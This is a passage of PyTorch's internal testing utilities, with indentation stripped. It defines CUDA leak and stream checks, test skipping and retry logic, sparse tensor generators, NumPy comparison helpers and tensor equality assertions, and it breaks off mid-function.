saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
except TypeError:
return False
return True
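# Examples (illustrative):
#
#   is_iterable_of_tensors([torch.ones(2), torch.zeros(3)])  # -> True
#   is_iterable_of_tensors(torch.ones(2))                    # -> False (a Tensor itself doesn't count)
#   is_iterable_of_tensors([])                               # -> False unless include_empty=True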
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
@staticmethod
def get_cuda_memory_usage():
# we don't need to call CUDA synchronize because the statistics are not tracked at
# the actual freeing, but when the block is marked as free.
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
def __enter__(self):
self.befores = self.get_cuda_memory_usage()
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
afters = self.get_cuda_memory_usage()
for i, (before, after) in enumerate(zip(self.befores, afters)):
if not TEST_WITH_ROCM:
self.testcase.assertEqual(
before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
self.name, after - before, i))
else:
# See #62533
# ROCM: Sometimes the transient memory is reported as leaked memory
if before != after:
warnings.warn('{} leaked {} bytes ROCm memory on device {}'.format(
self.name, after - before, i), RuntimeWarning)
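# Example usage (illustrative sketch; `self` is a TestCase and `run_cuda_workload`
# is a hypothetical helper whose allocations must be freed before the block exits):
#
#   with CudaMemoryLeakCheck(self, name="test_foo"):
#       run_cuda_workload()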
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_IN_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE', 'dev')
)
except ImportError:
print('Failed to import hypothesis in common_utils, tests are not derandomized')
def check_if_enable(test: unittest.TestCase):
test_suite = str(test.__class__).split('\'')[1]
test_name = f'{test._testMethodName} ({test_suite})'
if slow_tests_dict is not None and test_name in slow_tests_dict:
getattr(test, test._testMethodName).__dict__['slow_test'] = True
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
if not IS_SANDCASTLE and disabled_tests_dict is not None:
if test_name in disabled_tests_dict:
issue_url, platforms = disabled_tests_dict[test_name]
platform_to_conditional: Dict = {
"mac": IS_MACOS,
"macos": IS_MACOS,
"win": IS_WINDOWS,
"windows": IS_WINDOWS,
"linux": IS_LINUX,
"rocm": TEST_WITH_ROCM,
"asan": TEST_WITH_ASAN
}
if platforms == [] or any([platform_to_conditional[platform] for platform in platforms]):
raise unittest.SkipTest(
f"Test is disabled because an issue exists disabling it: {issue_url}" +
f" for {'all' if platforms == [] else ''}platform(s) {', '.join(platforms)}. " +
"If you're seeing this on your local machine and would like to enable this test, " +
"please make sure IN_CI is not set and you are not using the flag --import-disabled-tests.")
if TEST_SKIP_FAST:
if not getattr(test, test._testMethodName).__dict__.get('slow_test', False):
raise unittest.SkipTest("test is fast; we disabled it with PYTORCH_TEST_SKIP_FAST")
# Acquires the comparison dtype, required since isclose
# requires both inputs to have the same dtype, and isclose is not supported
# for some device x dtype combinations.
# NOTE: Remaps bfloat16 to float32 since neither the CPU nor CUDA device types
# support needed bfloat16 comparison methods.
# NOTE: Remaps float16 to float32 on CPU since the CPU device type doesn't
# support needed float16 comparison methods.
# TODO: Update this once bfloat16 and float16 are better supported.
def get_comparison_dtype(a, b):
# TODO: update this when promote_types supports bfloat16 and/or
# isclose supports bfloat16.
a_dtype = torch.float32 if a.dtype is torch.bfloat16 else a.dtype
b_dtype = torch.float32 if b.dtype is torch.bfloat16 else b.dtype
compare_dtype = torch.promote_types(a_dtype, b_dtype)
# non-CUDA (CPU, for example) float16 -> float32
# TODO: update this when isclose is implemented for CPU float16
if (compare_dtype is torch.float16 and
(a.device != b.device or a.device.type != 'cuda' or
b.device.type != 'cuda')):
compare_dtype = torch.float32
return compare_dtype
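# Example (illustrative): comparing two CPU float16 tensors falls back to float32,
# since isclose is not implemented for float16 on the CPU:
#
#   a = torch.ones(2, dtype=torch.float16)  # CPU tensor
#   b = torch.ones(2, dtype=torch.float16)
#   get_comparison_dtype(a, b)              # -> torch.float32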
# This implements a variant of assertRaises/assertRaisesRegex where we first test
# if the exception is NotImplementedError, and if so just skip the test instead
# of failing it.
#
# This is implemented by inheriting from the (private) implementation of
# assertRaises from unittest.case, and slightly tweaking it for this new
# behavior. The year is 2021: this private class hierarchy hasn't changed since
# 2010, seems low risk to inherit from.
class AssertRaisesContextIgnoreNotImplementedError(unittest.case._AssertRaisesContext):
def __exit__(self, exc_type, exc_value, tb):
if exc_type is not None and issubclass(exc_type, NotImplementedError):
self.test_case.skipTest(f"not_implemented: {exc_value}") # type: ignore[attr-defined]
return super().__exit__(exc_type, exc_value, tb)
@contextmanager
def set_warn_always_context(new_val: bool):
old_val = torch.is_warn_always_enabled()
torch.set_warn_always(new_val)
try:
yield
finally:
torch.set_warn_always(old_val)
class TestCase(expecttest.TestCase):
# NOTE: "precision" lets classes and generated tests set minimum
# atol values when comparing tensors. Used by @precisionOverride and @toleranceOverride, for
# example.
# NOTE: "rel_tol" lets classes and generated tests set minimum
# rtol values when comparing tensors. Used by @toleranceOverride, for example.
_precision: float = 0
_rel_tol: float = 0
# checker to early terminate test suite if unrecoverable failure occurs.
def _should_stop_test_suite(self):
if torch.cuda.is_initialized():
# CUDA device side error will cause subsequence test cases to fail.
# stop entire test suite if catches RuntimeError during torch.cuda.synchronize().
try:
torch.cuda.synchronize()
except RuntimeError as rte:
return True
return False
else:
return False
@property
def precision(self) -> float:
return self._precision
@precision.setter
def precision(self, prec: float) -> None:
self._precision = prec
@property
def rel_tol(self) -> float:
return self._rel_tol
@rel_tol.setter
def rel_tol(self, prec: float) -> None:
self._rel_tol = prec
_do_cuda_memory_leak_check = False
_do_cuda_non_default_stream = False
# When True, if a test case raises a NotImplementedError, instead of failing
# the test, skip it instead.
_ignore_not_implemented_error = False
def __init__(self, method_name='runTest'):
super().__init__(method_name)
test_method = getattr(self, method_name, None)
if test_method is not None:
# Wraps the tested method if we should do CUDA memory check.
if not TEST_SKIP_CUDA_MEM_LEAK_CHECK:
self._do_cuda_memory_leak_check &= getattr(test_method, '_do_cuda_memory_leak_check', True)
# FIXME: figure out the flaky -1024 anti-leaks on windows. See #8044
if self._do_cuda_memory_leak_check and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.assertLeaksNoCudaTensors)
# Wraps the tested method if we should enforce non default CUDA stream.
self._do_cuda_non_default_stream &= getattr(test_method, '_do_cuda_non_default_stream', True)
if self._do_cuda_non_default_stream and not IS_WINDOWS:
self.wrap_with_cuda_policy(method_name, self.enforceNonDefaultStream)
if self._ignore_not_implemented_error:
self.wrap_with_policy(method_name, lambda: skip_exception_type(NotImplementedError))
def assertLeaksNoCudaTensors(self, name=None):
name = self.id() if name is None else name
return CudaMemoryLeakCheck(self, name)
def enforceNonDefaultStream(self):
return CudaNonDefaultStream()
def wrap_with_cuda_policy(self, method_name, policy):
test_method = getattr(self, method_name)
# the import below may initialize CUDA context, so we do it only if
# self._do_cuda_memory_leak_check or self._do_cuda_non_default_stream
# is True.
# TODO: sure looks like we unconditionally initialize the context here
# -- ezyang
from torch.testing._internal.common_cuda import TEST_CUDA
fullname = self.id().lower() # class_name.method_name
if TEST_CUDA and ('gpu' in fullname or 'cuda' in fullname):
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
def wrap_with_policy(self, method_name, policy):
test_method = getattr(self, method_name)
setattr(self, method_name, self.wrap_method_with_policy(test_method, policy))
# A policy is a zero-argument function that returns a context manager.
# We don't take the context manager directly as it may be necessary to
# construct it once per test method
def wrap_method_with_policy(self, method, policy):
# Assumes that `method` is the tested function in `self`.
# NOTE: Python exceptions (e.g., unittest.SkipTest) keep objects in scope
# alive, so this cannot be done in setUp and tearDown because
# tearDown is run unconditionally no matter whether the test
# passes or not. For the same reason, we can't wrap the `method`
# call in try-finally and always do the check.
@wraps(method)
def wrapper(self, *args, **kwargs):
with policy():
method(*args, **kwargs)
return types.MethodType(wrapper, self)
def wrap_with_cuda_memory_check(self, method):
return self.wrap_method_with_policy(method, self.assertLeaksNoCudaTensors)
# Recursive function that incorporates retry logic when PYTORCH_RETRY_TEST_CASES=1 and enables early test
# termination. [DISCLAIMER: ONLY WORKS WITH UNITTEST]
# When report_only is True, flaky tests are only reported, but the signal remains the same (the test will still
# show up red).
# Otherwise, the flaky test will show up green while its stats are captured by test reports.
def _run_with_retry(self, result=None, num_runs_left=0, report_only=True):
if num_runs_left == 0:
return
using_unittest = isinstance(result, unittest.TestResult)
if using_unittest:
failures_before = 0 if result is None else len(result.failures) # num tests marked as failed before starting
errors_before = 0 if result is None else len(result.errors) # num tests marked as errored before starting
super().run(result=result)
# Early terminate test if necessary.
if self._should_stop_test_suite():
result.stop()
if not RETRY_TEST_CASES or not using_unittest:
return
err = sys.exc_info()
num_retries_left = num_runs_left - 1
if failures_before < len(result.failures):
print(f" {self._testMethodName} failed - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.failures.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif errors_before < len(result.errors):
print(f" {self._testMethodName} errored - num_retries_left: {num_retries_left}")
if (report_only and num_retries_left < MAX_NUM_RETRIES) or (not report_only and num_retries_left > 0):
result.errors.pop(-1)
result.addExpectedFailure(self, err)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
elif report_only and num_retries_left < MAX_NUM_RETRIES:
print(f" {self._testMethodName} succeeded - num_retries_left: {num_retries_left}")
result.addUnexpectedSuccess(self)
self._run_with_retry(result=result, num_runs_left=num_retries_left, report_only=report_only)
def run(self, result=None):
num_runs = MAX_NUM_RETRIES + 1 if RETRY_TEST_CASES else 1
self._run_with_retry(result=result, num_runs_left=num_runs, report_only=not OVERRIDE_FLAKY_SIGNAL)
def setUp(self):
check_if_enable(self)
set_rng_seed(SEED)
@staticmethod
def _make_crow_indices(n_rows, n_cols, nnz,
*, device, dtype, random=True):
"""Return crow_indices of a CSR tensor with size (n_rows, n_cols) and
the number of specified elements nnz.
If random is True, the column counts of rows are in random
order. Otherwise, the column counts of rows are defined by the
used sampling method.
Sampling method
---------------
The used sampling method was introduced in
https://pearu.github.io/csr_sampling.html, and here we give
only an overall description of the method.
Notice that crow_indices can be defined as cumsum(counts)
where counts is a sequence of non-negative integers satisfying
the following conditions:
len(counts) == n_rows + 1
counts.max() <= n_cols
where counts[i + 1] is interpreted as the number of specified
elements in the i-th row.
The used sampling method aims at increasing the diversity of
CSR samples, that is, a CSR sample should contain (i) rows
that are all filled, (ii) rows with no elements at all, and
(iii) rows that are partially filled. At the same time and for
the given total number of specified elements (nnz), there
should be minimal preference to rows with a given number of
elements. To achieve this, the sampling method is built up
using a sawteeth model for counts. In the simplest case, we
would have
counts = arange(n_rows + 1) % (n_cols + 1)
that has equal number of all possible column counts per row.
This formula can be used only for specific input values of
n_rows, n_cols, and nnz. To generalize this model to any
combinations of inputs, the counts model above is extended
with an incomplete sawtooth, and the right and lower
rectangular parts that will guarantee that
counts.sum() == nnz
for any combination of n_rows, n_cols, and nnz. Basically,
we'll find a maximal window in (n_rows + 1, n_cols + 1)-grid
that is able to hold a sequence of sawteeth and so-called
final correction, while the external part of the window is
filled with counts to meet the nnz constraint exactly.
"""
assert 0 <= nnz <= n_rows * n_cols
def sawteeth(n, m):
# return the total number of counts in the sequence of
# sawteeth where n and m define a window in (n_rows+1,
# n_cols+1) rectangle where the sequence of sawteeth
# perfectly fit.
M = (n_cols - m) * (n_cols - m + 1) // 2
K = (n_rows - n) % (n_cols - m + 1)
return M * ((n_rows - n) // (n_cols - m + 1)) + K * (K - 1) // 2
# Different from the original method description, here counts
# has leading 0 required by crow_indices:
counts = torch.zeros(n_rows + 1, dtype=dtype, device=torch.device('cpu'))
n = m = 0
N = sawteeth(n, m)
if N and nnz >= max(N, n_cols):
# determine the width of the sawteeth window. We use bisection to solve
# N(n, 0) == 0 or nnz - n * n_cols < max(N(n, 0), n_cols)
# for n
n_left = n
n_right = n_rows - 1
N_right = sawteeth(n_right, m)
while n_right - n_left > 1:
n_middle = (n_left + n_right) // 2
N_middle = sawteeth(n_middle, m)
if N_middle == 0 or nnz - n_middle * n_cols < max(N_middle, n_cols):
n_right, N_right = n_middle, N_middle
else:
n_left = n_middle
n, N = n_right, N_right
# fill the right rectangle with counts:
assert n
counts[-n:].fill_(n_cols)
if N and nnz - n * n_cols >= max(N, n_rows - n):
# determine the height of the sawteeth window. We use bisection to solve
# N(n, m) == 0 or nnz - n * n_cols - m * (n_rows - n) < max(N(n, m), n_rows - n)
# for m.
m_left = m
m_right = n_cols - 1
N_right = sawteeth(n, m_right)
while m_right - m_left > 1:
m_middle = (m_left + m_right) // 2
N_middle = sawteeth(n, m_middle)
if N_middle == 0 or nnz - n * n_cols - m_middle * (n_rows - n) < max(N_middle, n_rows - n):
m_right, N_right = m_middle, N_middle
else:
m_left = m_middle
m, N = m_right, N_right
# fill the bottom rectangle with counts:
assert m
counts[1:n_rows - n + 1].fill_(m)
if N:
# fill the sawteeth window with counts
q, r = divmod(nnz - n * n_cols - m * (n_rows - n),
(n_cols - m) * (n_cols - m + 1) // 2)
p = 1 + q * (n_cols - m + 1)
if sys.version_info >= (3, 8):
k = math.isqrt(2 * r)
else:
# math.isqrt(x) is available starting from Python 3.8.
# Here we use int(math.sqrt(x)) as an approximation
# that appears to give the exact result for all x values
# less than 2**35, at least; the upper limit of x is
# TBD.
k = int(math.sqrt(2 * r))
if k * (k + 1) > 2 * r:
k -= 1
corr = r - k * (k + 1) // 2
assert not ((p > 1) and (m > 0)) # full sawteeth are never on top of a bottom rectangle
# sequence of full sawteeth:
counts[1:p] = torch.arange(p - 1, dtype=dtype, device=counts.device) % (n_cols - m + 1)
# incomplete sawtooth:
counts[p:p + k + 1] += torch.arange(k + 1, dtype=dtype, device=counts.device)
else:
# given input does not support sawteeth
p = 1
corr = nnz - n * n_cols - m * (n_rows - n)
# correction that will guarantee counts.sum() == nnz:
counts[p] += corr
if random:
# randomize crow_indices by shuffling the sawteeth
# sequence:
perm = torch.randperm(n_rows, device=counts.device)
counts[1:] = counts[1:][perm]
# compute crow_indices:
crow_indices = counts
crow_indices.cumsum_(dim=0)
return crow_indices.to(device=device)
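# Worked example for the sampling description above (illustrative): for
# n_rows=3, n_cols=4 and nnz=7, one valid counts sequence is [0, 2, 4, 1]
# (leading zero, counts.max() <= n_cols, counts.sum() == nnz), which gives
# crow_indices = cumsum(counts) = [0, 2, 6, 7].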
def genSparseCSRTensor(self, size, nnz, *, device, dtype, index_dtype):
sparse_dim = 2
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
assert len(size) == sparse_dim
def random_sparse_csr(n_rows, n_cols, nnz):
crow_indices = self._make_crow_indices(n_rows, n_cols, nnz, device=device, dtype=index_dtype)
col_indices = torch.zeros(nnz, dtype=index_dtype, device=device)
for i in range(n_rows):
count = crow_indices[i + 1] - crow_indices[i]
col_indices[crow_indices[i]:crow_indices[i + 1]], _ = torch.sort(
torch.randperm(n_cols, dtype=index_dtype, device=device)[:count])
values = make_tensor([nnz], device=device, dtype=dtype, low=-1, high=1)
return values, crow_indices, col_indices
values, crow_indices, col_indices = random_sparse_csr(size[0], size[1], nnz)
return torch.sparse_csr_tensor(crow_indices,
col_indices,
values, size=size, dtype=dtype, device=device)
def genSparseTensor(self, size, sparse_dim, nnz, is_uncoalesced, device, dtype):
# Assert not given impossible combination, where the sparse dims have
# empty numel, but nnz > 0 makes the indices containing values.
assert all(size[d] > 0 for d in range(sparse_dim)) or nnz == 0, 'invalid arguments'
v_size = [nnz] + list(size[sparse_dim:])
v = make_tensor(v_size, device=device, dtype=dtype, low=-1, high=1)
i = torch.rand(sparse_dim, nnz, device=device)
i.mul_(torch.tensor(size[:sparse_dim]).unsqueeze(1).to(i))
i = i.to(torch.long)
if is_uncoalesced:
v = torch.cat([v, torch.randn_like(v)], 0)
i = torch.cat([i, i], 1)
x = torch.sparse_coo_tensor(i, v, torch.Size(size), dtype=dtype, device=device)
if not is_uncoalesced:
x = x.coalesce()
else:
# FIXME: `x` is a sparse view of `v`. Currently rebase_history for
# sparse views is not implemented, so this workaround is
# needed for inplace operations done on `x`, e.g., copy_().
# Remove after implementing something equivalent to CopySlice
# for sparse views.
# NOTE: We do clone() after detach() here because we need to be able to change size/storage of x afterwards
x = x.detach().clone()
return x, x._indices().clone(), x._values().clone()
def safeToDense(self, t):
return t.coalesce().to_dense()
# Compares a torch function with a reference function for a given sample input (object of SampleInput)
# Note: only values are compared, type comparison is not done here
def compare_with_reference(self, torch_fn, ref_fn, sample_input, **kwargs):
n_inp, n_args, n_kwargs = sample_input.numpy()
t_inp, t_args, t_kwargs = sample_input.input, sample_input.args, sample_input.kwargs
actual = torch_fn(t_inp, *t_args, **t_kwargs)
expected = ref_fn(n_inp, *n_args, **n_kwargs)
self.assertEqual(actual, expected, exact_device=False)
# Compares the given Torch and NumPy functions on the given tensor-like object.
# NOTE: both torch_fn and np_fn should be functions that take a single
# tensor (array). If the torch and/or NumPy function require additional
# arguments then wrap the function in a lambda or pass a partial function.
# TODO: add args/kwargs for passing to assertEqual (e.g. rtol, atol)
def compare_with_numpy(self, torch_fn, np_fn, tensor_like,
device=None, dtype=None, **kwargs):
assert TEST_NUMPY
if isinstance(tensor_like, torch.Tensor):
assert device is None
assert dtype is None
t_cpu = tensor_like.detach().cpu()
if t_cpu.dtype is torch.bfloat16:
t_cpu = t_cpu.float()
a = t_cpu.numpy()
t = tensor_like
else:
d = copy.copy(torch_to_numpy_dtype_dict)
d[torch.bfloat16] = np.float32
a = np.array(tensor_like, dtype=d[dtype])
t = torch.tensor(tensor_like, device=device, dtype=dtype)
np_result = np_fn(a)
torch_result = torch_fn(t).cpu()
# Converts arrays to tensors
if isinstance(np_result, np.ndarray):
try:
np_result = torch.from_numpy(np_result)
except Exception:
# NOTE: copying an array before conversion is necessary when,
# for example, the array has negative strides.
np_result = torch.from_numpy(np_result.copy())
if t.dtype is torch.bfloat16 and torch_result.dtype is torch.bfloat16 and np_result.dtype is torch.float:
torch_result = torch_result.to(torch.float)
self.assertEqual(np_result, torch_result, **kwargs)
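# Example usage (illustrative sketch, from inside a test method):
#
#   self.compare_with_numpy(torch.sin, np.sin, [0.0, 0.5, 1.0],
#                           device='cpu', dtype=torch.float32)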
# Some analysis of tolerance by logging tests from test_torch.py can be found
# in https://github.com/pytorch/pytorch/pull/32538.
# dtype name : (rtol, atol)
dtype_precisions = {
torch.float16 : (0.001, 1e-5),
torch.bfloat16 : (0.016, 1e-5),
torch.float32 : (1.3e-6, 1e-5),
torch.float64 : (1e-7, 1e-7),
torch.complex32 : (0.001, 1e-5),
torch.complex64 : (1.3e-6, 1e-5),
torch.complex128 : (1e-7, 1e-7),
}
# Returns the "default" rtol and atol for comparing scalars or
# tensors of the given dtypes.
def _getDefaultRtolAndAtol(self, dtype0, dtype1):
rtol = max(self.dtype_precisions.get(dtype0, (0, 0))[0],
self.dtype_precisions.get(dtype1, (0, 0))[0])
atol = max(self.dtype_precisions.get(dtype0, (0, 0))[1],
self.dtype_precisions.get(dtype1, (0, 0))[1])
return rtol, atol
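# Example (illustrative): for dtype0=torch.float16 and dtype1=torch.float32 the
# defaults are rtol = max(0.001, 1.3e-6) = 0.001 and atol = max(1e-5, 1e-5) = 1e-5.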
# Checks if two dense tensors are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# If exact_dtype is true both tensors must have the same dtype.
# If exact_device is true both tensors must be on the same device.
# See the "Test Framework Tensor 'Equality'" note for more details.
# NOTE: tensors on different devices are moved to the CPU to be compared when
# exact_device is False.
# NOTE: this function checks the tensors' devices, sizes, and dtypes
# and acquires the appropriate device, dtype, rtol and atol to compare
# them with. It then calls _compare_tensors_internal.
def _compareTensors(self, a, b, *, rtol: Optional[float] = None, atol=None, equal_nan=True,
exact_dtype=True, exact_device=False) -> _compare_return_type:
assert (atol is None) == (rtol is None)
if not isinstance(a, torch.Tensor):
return (False, "argument a, {0}, to _compareTensors is not a tensor!".format(a))
if not isinstance(b, torch.Tensor):
return (False, "argument b, {0}, to _compareTensors is not a tensor!".format(b))
# Validates tensors are on the same device
if exact_device and a.device != b.device:
return (False, ("Attempted to compare equality of tensors on "
"different devices! Got devices {0} and "
"{1}.".format(a.device, b.device)))
# Compares tensors of different devices on the CPU
if a.device != b.device:
a = a.cpu()
b = b.cpu()
# Checks size matches
if a.size() != b.size():
return (False, ("Attempted to compare equality of tensors with "
"different sizes. Got sizes {0} and {1}.").format(a.size(), b.size()))
# Checks dtype (if exact_dtype)
if exact_dtype and a.dtype is not b.dtype:
return (False, ("Attempted to compare equality of tensors with "
"different dtypes. Got dtypes {0} and {1}.").format(a.dtype, b.dtype))
# Acquires rtol and atol
if rtol is None:
rtol, atol = self._getDefaultRtolAndAtol(a.dtype, b.dtype)
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
# Converts to comparison dtype
dtype = get_comparison_dtype(a, b)
a = a.to(dtype)
b = b.to(dtype)
return _compare_tensors_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Checks if two scalars are equal(-ish), returning (True, None)
# when they are and (False, debug_msg) when they are not.
# NOTE: this function just acquires rtol and atol
# before calling _compare_scalars_internal.
def _compareScalars(self, a, b, *,
rtol: Optional[float] = None, atol: Optional[float] = None, equal_nan=True) -> _compare_return_type:
# Acquires rtol and atol
assert (atol is None) == (rtol is None)
if rtol is None:
if isinstance(a, complex) or isinstance(b, complex):
rtol, atol = self._getDefaultRtolAndAtol(torch.complex64, torch.complex64)
elif isinstance(a, float) or isinstance(b, float):
rtol, atol = self._getDefaultRtolAndAtol(torch.float32, torch.float32)
else:
rtol, atol = 0, 0
rtol = cast(float, rtol)
atol = cast(float, atol)
assert atol is not None
atol = max(atol, self.precision)
rtol = max(rtol, self.rel_tol)
return _compare_scalars_internal(a, b, rtol=rtol, atol=atol, equal_nan=equal_nan)
# Construct assert messages based on the internal debug message and the user-provided message.
def _get_assert_msg(self, msg, debug_msg=None):
if msg is None:
return debug_msg
else:
return f"\n{msg}" if debug_msg is None else f"{debug_msg}\n{msg}"
def assertEqualIgnoreType(self, *args, **kwargs) -> None:
# If you are seeing this function used, that means the test is written incorrectly
# and deserves detailed investigation
return self.assertEqual(*args, exact_dtype=False, **kwargs)
def _is_dict(self, obj):
return isinstance(obj, (dict, torch._C.ScriptDict)) # type: ignore[attr-defined]
# Compares x and y
# TODO: default exact_device to True
def assertEqual(self, x, y, msg: Optional[str] = None, *,
atol: Optional[float] = None, rtol: Optional[float] = None,
equal_nan=True, exact_dtype=True, exact_device=False) -> None:
assert (atol is None) == (rtol is None), "If one of atol or rtol is specified, then the other must be too"
debug_msg: Optional[str] = None
if x is None or y is None:
self.assertTrue(x is None and y is None)
# Tensor x Number and Number x Tensor comparisons
elif isinstance(x, torch.Tensor) and isinstance(y, Number):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, Number):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x np.bool
elif isinstance(x, torch.Tensor) and isinstance(y, np.bool_):
self.assertEqual(x.item(), y, atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif isinstance(y, torch.Tensor) and isinstance(x, np.bool_):
self.assertEqual(x, y.item(), atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
# Tensor x Tensor
elif isinstance(x, torch.Tensor) and isinstance(y, torch.Tensor):
debug_msg = ("Attempted to compare with different is_sparse settings: "
f"Expected: {x.is_sparse}; Actual: {y.is_sparse}.")
super().assertEqual(x.is_sparse, y.is_sparse, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
debug_msg = ("Attempted to compare with different is_quantized settings: "
f"Expected: {x.is_quantized}; Actual: {y.is_quantized}.")
super().assertEqual(x.is_quantized, y.is_quantized, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg))
if x.is_sparse:
if x.size() != y.size():
debug_msg_sparse = ("Attempted to compare equality of tensors with different sizes: "
f"Expected: {x.size()}; Actual: {y.size()}.")
super().assertTrue(False, msg=self._get_assert_msg(msg=msg, debug_msg=debug_msg_sparse))
x = x.coalesce()
y = y.coalesce()
indices_result, debug_msg_indices = self._compareTensors(x._indices(), y._indices(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not indices_result:
assert debug_msg_indices is not None
debug_msg = "Sparse tensor indices failed to compare as equal! " + debug_msg_indices
super().assertTrue(indices_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
values_result, debug_msg_values = self._compareTensors(x._values(), y._values(),
rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not values_result:
assert debug_msg_values is not None
debug_msg = "Sparse tensor values failed to compare as equal! " + debug_msg_values
super().assertTrue(values_result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif x.is_quantized and y.is_quantized:
self.assertEqual(x.qscheme(), y.qscheme(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
if x.qscheme() == torch.per_tensor_affine:
self.assertEqual(x.q_scale(), y.q_scale(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_zero_point(), y.q_zero_point(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
elif x.qscheme() == torch.per_channel_affine:
self.assertEqual(x.q_per_channel_scales(), y.q_per_channel_scales(), atol=atol, rtol=rtol,
msg=msg, exact_dtype=exact_dtype,
exact_device=exact_device)
self.assertEqual(x.q_per_channel_zero_points(), y.q_per_channel_zero_points(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
self.assertEqual(x.q_per_channel_axis(), y.q_per_channel_axis(),
atol=atol, rtol=rtol, msg=msg,
exact_dtype=exact_dtype, exact_device=exact_device)
result, debug_msg_compare = self._compareTensors(x.int_repr().to(torch.int32),
y.int_repr().to(torch.int32),
atol=atol, rtol=rtol,
exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_compare is not None
debug_msg = "Quantized representations failed to compare as equal! " + debug_msg_compare
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
else:
result, debug_msg_generic = self._compareTensors(x, y, rtol=rtol, atol=atol,
equal_nan=equal_nan, exact_dtype=exact_dtype,
exact_device=exact_device)
if not result:
assert debug_msg_generic is not None
debug_msg = "Tensors failed to compare as equal!" + debug_msg_generic
super().assertTrue(result, msg=self._get_assert_msg(msg, debug_msg=debug_msg))
elif isinstance(x, (np.ndarray, torch.Tensor)) or isinstance(y, (np.ndarray, torch.Tensor)):
